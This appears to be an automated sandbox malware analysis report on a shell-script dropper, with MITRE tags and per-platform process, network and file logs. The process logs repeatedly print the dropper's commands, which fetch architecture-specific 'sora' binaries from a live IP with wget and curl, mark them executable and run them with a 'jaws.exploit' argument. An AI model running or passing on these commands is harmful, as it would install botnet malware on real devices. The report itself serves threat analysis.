Malware Analysis Report

2025-06-15 23:10

Sample ID 241018-b7tkvssdll
Target 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
SHA256 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a

Threat Level: Shows suspicious behavior

The file 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

Executes dropped EXE

File and Directory Permissions Modification

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-18 01:47

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-18 01:47

Reported

2024-10-18 01:50

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

3s

Max time network

129s

Command Line

[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh N/A

Processes

/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh

[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh config-err-PU8zzp netplan_ot4kxa4r robben snap-private-tmp ssh-zbwPaKMzi2qM systemd-private-bf208f6257324ef8b3d477b75786447e-bolt.service-kcCX9t systemd-private-bf208f6257324ef8b3d477b75786447e-colord.service-YLtGJA systemd-private-bf208f6257324ef8b3d477b75786447e-ModemManager.service-4VyTbV systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-resolved.service-wNuPt9 systemd-private-bf208f6257324ef8b3d477b75786447e-systemd-timedated.service-soB7o3]

/tmp/robben

[./robben jaws.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
N/A 224.0.0.251:5353 udp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.17:443 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.61:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-18 01:47

Reported

2024-10-18 01:50

Platform

debian9-armhf-20240611-en

Max time kernel

37s

Max time network

41s

Command Line

[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh N/A

Processes

/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh

[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-13ae23ec3982446b932844f4c7b6a787-systemd-timedated.service-ZpoUbd]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben]

/tmp/robben

[./robben jaws.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-18 01:47

Reported

2024-10-18 01:50

Platform

debian9-mipsbe-20240729-en

Max time kernel

34s

Max time network

33s

Command Line

[/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
